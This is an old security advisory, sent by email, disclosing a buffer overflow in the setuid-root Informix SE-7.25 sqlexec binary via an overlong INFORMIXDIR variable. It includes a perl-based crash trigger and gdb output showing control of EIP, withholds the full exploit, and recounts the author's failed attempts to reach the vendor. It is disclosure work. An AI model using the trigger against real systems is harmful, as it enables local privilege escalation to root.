Date: Thu, 30 May 2002 01:32:51 +0200 (CEST)
From: [email protected]
To: [email protected]Subject: Informix SE-7.25 /lib/sqlexec Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Title: Local Vulnerability in Informix SE-7.25
Date: 21-04-2002
Platform: Only tested in Linux but can be exported to others.
Impact: Users with exec perm over /lib/sqlexec can obtain euid=0
Author: Juan Manuel Pascual Escriba <[email protected]>
Status: Vendor contacted details below.
PROBLEM SUMMARY:
Buffer overflow exists if INFORMIXDIR enviroment variable is defined
with a size greater than 2023 bytes
[pask@dimoni lib]$ ls -FAlsc
total 2588
4 drwxrwxr-x 2 informix informix 4096 May 28 22:50 boom/
1484 -rwsr-sr-x 1 root informix 1515480 Apr 20 22:09 sqlexec*
504 -rwxr-xr-x 1 informix informix 510283 Apr 20 22:09 sqlexecd*
596 -rwxr-xr-x 1 informix informix 606041 Apr 20 22:09 sqlrm*
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault
[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) info registers
...
esp 0x3fffed08 0x3fffed08
ebp 0x41414141 0x41414141
esi 0x3fffedf9 1073737209
edi 0x8191571 135861617
eip 0x41414141 0x41414141
...
IMPACT:
Users with exec perm over /lib/sqlexec can obtain euid=0
in a standard installation of Informix SE-7.25
EXPLOIT
Will be available when IBM develops a patch.
STATUS
At 21th April i tried to contact with IBM through
http://www.ibm.com/contact,i received a quick answer
telling me that i can email [email protected] for
report this vulnerability. This email address dont exist
or is misconfigured (i received the message returned).
At 28th May i tried to contact with IBM through
[email protected], they answer the email telling me
"to call to Main support Line and choose option 3 to speak
customer service representative who will be happy to assist
me".
I'm sorry but im not happy to pay an international call bill.
and im not a customer.
Status of this advisory would be checked at:
http://concepcion.upv.es/~pask/advisories
- --------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba [email protected]
- --
"In god We Trust, Others We monitor"
----------------------------------------------------------
Juan Manuel Pascual Escriba
Midnight Systems & Security Manager
PGP PubKey http://concepcion.upv.es/~pask/publica.pgp
----------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQEVAwUBPPVlKDX3KWOaq4SJAQETqwf8DpQ8el1tEt/M8JA7r1xgzZdTPqrEVpRD
besDoryOU5xSRY1waGKILxqhm9G7/81+YGjhYLBB+KRkKTqK2LjWgrmu6/SyHLXW
hSJEoT4JjMT2rsJ1THNt8pglmqeMwAd8ncXZpSodWqByieQ6ly6uI1IcTSFViuAh
cvpc4Pk8zORELtNmFfnNRz93dEEnWo19odX7cx0tutqJUjosI0VfCX9kKs2iRjmM
5Fj1sGsTl1AHqcdJTmOzFQieA8ywFdS8vnEBuK6jqIHFc1Gn7e5c00K6Fu7ZFsZq
erx8tg7F93myY0wpq5AsYiiepgWUqLMyaeb1hjRiTn/X4F5eVHbtmg==
=4P/J
-----END PGP SIGNATURE-----
